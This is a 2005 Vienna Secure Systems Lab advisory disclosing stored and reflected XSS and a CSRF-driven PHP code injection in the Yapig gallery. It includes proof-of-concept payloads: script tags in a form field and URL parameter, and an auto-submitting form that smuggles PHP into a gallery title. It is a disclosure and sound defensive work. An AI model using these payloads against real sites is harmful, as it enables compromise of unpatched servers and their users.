===========================================================
Yapig: XSS / Code Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0510-001, October 13, 2005
===========================================================
Affected applications
----------------------
Yapig (yapig.sourceforge.net)
Versions 0.95b and prior.
Description
------------
1.) Stored XSS
An attacker can include malicious JavaScript by posting an image-related comment and inserting something like the following into the "Homepage" form field:
"><script>alert('hi')</script>
This attack falls under the category of stored cross-site scripting and doesn't require the attacker to be logged in.
2.) Reflected XSS
An attacker can include malicious JavaScript by tricking a user into clicking a link to the following URL:
http://your-server/path-to-yapig/view.php?gid=1&phid=1&img_size=><script
>alert('hi')</script>
The fields "your-server" and "path-to-yapig" in the given URL have to be adjusted accordingly. The parameters "gid=1" and "phid=1" assume that there exist a gallery and a photo with ID 1 and can be adjusted as well.
Moreover, the width of the image being viewed has to be less than $MAX_IMG_SIZE (set inside config.php) because otherwise, the vulnerable variable $img_size is set to a safe value inside the if-branch on line 120 of view.php. And finally, register_globals has to be active.
3.) Code Injection
An attacker can inject arbitrary PHP code into a gallery's "guid_info.php" file by tricking the logged-in admin into clicking a link to a page with the following contents:
<form method="post" action="http://your-server/path-to-yapig/yapig095b/modify_gallery.php?ac
tion=mod_info&gid=1">
<input value='TestGallery"; echo "evil' name="title" type="text">
<input value="TestAuthor" name="author" type="text">
<input value="TestDate" name="date" type="text">
<input value="" name="dir" type="text">
<input value="TestDescription" name="desc" type="text">
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
As for vulnerability #2, "your-server", "path-to-yapig", "gid" and "phid" can be adjusted.
Apart from this, Yapig seems to be susceptible to "Cross-Site Request Forgery" (CSRF) attacks in general. However, this problem is not limited to Yapig, but affects a large number of comparable web applications available at this time.
Solution
---------
Attempts to contact the authors were not successful until now, so there is no official solution available yet.
Timeline:
September 28, 2005: Attempt to contact Yapig developers via "natasab at users.sourceforge.net".
October 5, 2005: Attempt to contact Yapig developers via Sourceforge bug tracker.
October 13, 2005: Advisory submission.
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at